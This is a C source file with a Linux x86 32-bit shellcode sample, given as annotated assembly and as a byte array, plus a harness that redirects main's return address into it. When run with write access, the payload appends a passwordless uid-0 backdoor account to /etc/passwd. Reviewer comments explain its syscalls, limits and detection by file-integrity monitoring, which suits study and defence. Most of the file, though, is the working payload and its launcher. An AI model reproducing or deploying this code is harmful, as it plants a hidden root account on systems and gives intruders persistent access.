/*
 * Linux/x86 (32-bit) shellcode that open()s /etc/passwd, write()s the line
 * "w000t::0:0:s4fem0de:/root:/bin/bash" to it, then close()s the file and
 * exit()s.  Written by zillion@safemode.org
 *
 * Reviewer notes (defensive reading of this sample):
 *  - The assembly uses the legacy int 0x80 ABI with syscall numbers
 *    5 (open), 4 (write), 6 (close) and 1 (exit) and is assembled as
 *    "BITS 32"; it does not run as-is on x86-64 or on non-Linux kernels.
 *  - open() is called with flags 1090 = 1024 (append) + 64 (create) + 2 (rw)
 *    and mode 744 octal.  The line it appends declares uid 0 / gid 0, so the
 *    payload only has an effect when the process already has write access
 *    to /etc/passwd; it contains no privilege escalation of its own.
 *  - The string table is patched in place: the '#' after "/etc/passwd" and
 *    the trailing "##" are NUL-terminated / turned into a newline at run
 *    time, which is why the bytes below differ from the plain strings.
 *  - Detection: an unexpected open()/write() of /etc/passwd (file-integrity
 *    monitoring, audit rules on that path) is the simplest indicator for
 *    what this sample does.
 *
 * BITS 32
 * jmp short callit
 * doit:
 *   pop esi
 *   xor eax, eax
 *   mov byte [esi + 11], al     ; terminate /etc/passwd
 *   mov byte [esi + 48], al     ; terminate our string bash
 *   mov byte [esi + 47], 0x9    ; this will become the newline (man ascii)
 *   inc byte [esi + 47]
 *   mov al, 5                   ; the syscall open() = 5
 *   lea ebx, [esi]              ; argument1
 *   mov cx, 1090                ; 1024 (append) + 64 (create if no exist) + 2 rw
 *   mov dx, 744q                ; if we need to create, these are the permissions
 *   int 0x80                    ; kernel int
 *   mov long ebx,eax            ; get the descriptor
 *   mov al, 4                   ; write system call
 *   lea ecx,[esi + 12]          ; the location of our data
 *   mov dx,9993                 ; 36 bytes is what we need to write
 *   sub dx,9957
 *   int 0x80                    ; kernel interrupt
 *   mov al, 6                   ; the close syscall = 6
 *   int 0x80                    ; clozzzz
 *   mov al, 0x01                ; exit system call
 *   xor ebx, ebx                ; clean up
 *   int 0x80                    ; and bail out
 * callit:
 *   call doit
 *   db '/etc/passwd#'
 *   db 'w000t::0:0:s4fem0de:/root:/bin/bash##'
 */

/* Byte-encoded form of the assembly listed above.  Note that the array is
 * NUL-terminated like any C string literal, so the trailing 0 byte is not
 * part of the payload itself. */
char shellcode[] =
    "\xeb\x3a\x5e\x31\xc0\x88\x46\x0b\x88\x46\x30\xc6\x46\x2f\x09"
    "\xfe\x46\x2f\xb0\x05\x8d\x1e\x66\xb9\x42\x04\x66\xba\xe4\x01"
    "\xcd\x80\x89\xc3\xb0\x04\x8d\x4e\x0c\x66\xba\x09\x27\x66\x81"
    "\xea\xe5\x26\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80"
    "\xe8\xc1\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77"
    "\x64\x23\x77\x30\x30\x30\x74\x3a\x3a\x30\x3a\x30\x3a\x73\x34"
    "\x66\x65\x6d\x30\x64\x65\x3a\x2f\x72\x6f\x6f\x74\x3a\x2f\x62"
    "\x69\x6e\x2f\x62\x61\x73\x68\x23\x23";

/*
 * Test harness: overwrites what it presumes is main()'s own saved return
 * address so that returning from main transfers control into shellcode[].
 *
 * Reviewer notes:
 *  - `(int *)&ret + 2` hard-codes a stack frame layout (presumably: ret,
 *    saved frame pointer, return address) that only holds for a 32-bit build
 *    with a frame pointer and no reordering of locals.  Writing through that
 *    pointer is undefined behavior; under other compilers or flags it crashes
 *    rather than transfers control.  The harness is no part of the payload.
 *  - `(int)shellcode` truncates a pointer on LP64 targets; like the payload,
 *    this harness is 32-bit only.
 *  - `void main()` is non-standard; `int main(void)` is the portable form.
 *  - shellcode[] lives in a writable data section, so control transfer into
 *    it presumably requires that section to be executable; on a toolchain
 *    enforcing W^X / NX this faults instead -- confirm for the target.
 */
void main() {
    int *ret;
    ret = (int *)&ret + 2;   /* presumed address of main's return address */
    (*ret) = (int)shellcode; /* redirect the return to the payload */
}